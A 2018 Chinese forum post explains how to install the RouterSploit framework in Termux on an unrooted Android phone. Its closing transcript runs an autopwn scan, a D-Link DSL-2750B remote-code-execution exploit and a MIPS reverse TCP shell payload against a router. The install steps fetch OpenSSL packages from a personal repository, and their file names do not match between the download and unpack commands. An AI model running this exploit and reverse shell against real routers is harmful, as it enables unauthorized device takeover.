-
-
[分享] 在Android 手机上搭建RouterSploit 测试环境(无需root)
-
2018-10-21 18:39
10442
-
[分享] 在Android 手机上搭建RouterSploit 测试环境(无需root)
最近在Android手机上搭建了RouterSploit 攻击测试环境,这样就可以方便的测试一些AP了。(提示,测试公开的WiFi AP之前,请征得对方的同意哦。)
RouterSploit 开始是一个专门针对路由器的测试工具,后来它的目标貌似转变成了能够攻击嵌入式设备的框架。
在Android手机上是利用termux这个工具来操作的。
termux默认是安装了python3的,因此,对于最新的
RouterSploit 是刚好支持的。如果想要支持python2的工具,那么可以按照这个网址的提示进行安装。
这个基本快捷键是这样的:
(注意:网上的资料说tab快捷键是 音量键+, D。然而并不是。 试了好多遍)
- tab命令补全 (volum +, and t)
- 展示所有支持的快捷键 (volum +, and q)
- 光标的左/右移动(volum +, and a/d)
- 前一个/后一个 commands (volum +, and w/s)
一些预备的库需要提前安装:
pkg update
pkg install git wget clang
apt install libffi libffi-dev
安装用于
cryptography的
wgethttps://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl_1.1.1-2_aarch64.deb.gz
wgethttps://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-dev_1.1.1-2_aarch64.deb.gz
wgethttps://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-tool_1.1.1-2_aarch64.deb.gz
gunzip openssl_1.1.1-2_arm.deb.gz
gunzip openssl-dev_1.1.1-2_arm.deb.gz
gunzip openssl-tool_1.1.1-2_arm.deb.gz
dpkg -i openssl_1.1.1-2_arm.deb
dpkg -i openssl-dev_1.1.1-2_arm.deb
dpkg -i openssl-tool_1.1.1-2_arm.deb
这里的默认安装会有问题,因此需要按照老版本的上述openssl。
接着就是clone
RouterSploit .并且安装一些必要的库文件了以及正式安装
RouterSploit
git clonehttps://www.github.com/threat9/routersploit
cd routersploit
pip install -r requirements.txt
这样就完成了安装。
网络如果不好可能会出现安装失误,多安装几次就好。
接下来就可以按照这里面的方式,最后的几个命令来测试目标的AP了。
python rsf.py
use scanner/autopwn
set target 192.168.1.1
rsf (AutoPwn) > use exploits/routers/dlink/dsl_2750b_rce
rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link DSL-2750B RCE) > check
[+] Target is vulnerable
rsf (D-Link DSL-2750B RCE) > run
cmd > show payloads
cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options
cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.10
cmd (MIPSBE Reverse TCP) > run
觉得好的同学请多多star, 多多fork, :)
阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开
发者可享99元/年,续费同价!
最后于 2018-11-7 15:22
被二当家a编辑
,原因: